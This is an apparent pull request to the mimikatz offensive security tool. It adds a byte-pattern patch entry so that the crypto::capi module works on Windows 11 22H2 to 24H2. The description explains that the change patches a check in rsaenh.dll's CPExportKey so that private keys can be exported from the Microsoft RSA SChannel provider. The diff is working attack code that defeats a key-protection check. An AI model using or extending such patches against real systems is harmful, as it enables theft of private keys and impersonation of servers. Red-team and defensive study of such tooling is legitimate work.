### PR TITLE
Update crypto::capi for Win11 22H2, 23H2, 24H2

### DIFF
--- a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c
+++ b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c
@@ -19,6 +19,7 @@ BYTE PTRN_W10_1809_CPExportKey_4000[] = {0x0c, 0x00, 0x40, 0x00, 0x00, 0x75};
 KULL_M_PATCH_GENERIC Capi4001References[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WIN5_CPExportKey_4001),	PTRN_WIN5_CPExportKey_4001},	{sizeof(PATC_WIN5_CPExportKey_EXPORT), PATC_WIN5_CPExportKey_EXPORT}, {-4}},
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_W6AL_CPExportKey_4001),	PTRN_W6AL_CPExportKey_4001},	{sizeof(PATC_W6AL_CPExportKey_EXPORT), PATC_W6AL_CPExportKey_EXPORT}, { 5}},
+	{KULL_M_WIN_BUILD_11_22H2,	{sizeof(PTRN_WIN5_CPExportKey_4001),	PTRN_WIN5_CPExportKey_4001},	{sizeof(PATC_WIN5_CPExportKey_EXPORT), PATC_WIN5_CPExportKey_EXPORT}, { 5}},
 };
 KULL_M_PATCH_GENERIC Capi4000References[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WIN5_CPExportKey_4000),	PTRN_WIN5_CPExportKey_4000},	{sizeof(PATC_WIN5_CPExportKey_EXPORT), PATC_WIN5_CPExportKey_EXPORT}, {-5}},


### PR DESCRIPTION
Hi !

The `rsaenh.dll` files in Windows 11 22H2 to 24H2 (latest at the time of this PR) have gone back to the old pattern from Windows XP for the first patched check in `CPExportKey`:

![Screenshot From 2025-04-09 12-41-55](https://github.com/user-attachments/assets/ae10922a-5180-4e2a-9115-fa66130db7af)


Currently, `crypto::capi` fails on these Windows versions. This PR brings compatibility for recent Win 11s, allowing to export private keys stored in the `Microsoft RSA SChannel Cryptographic Provider`.

Cheers !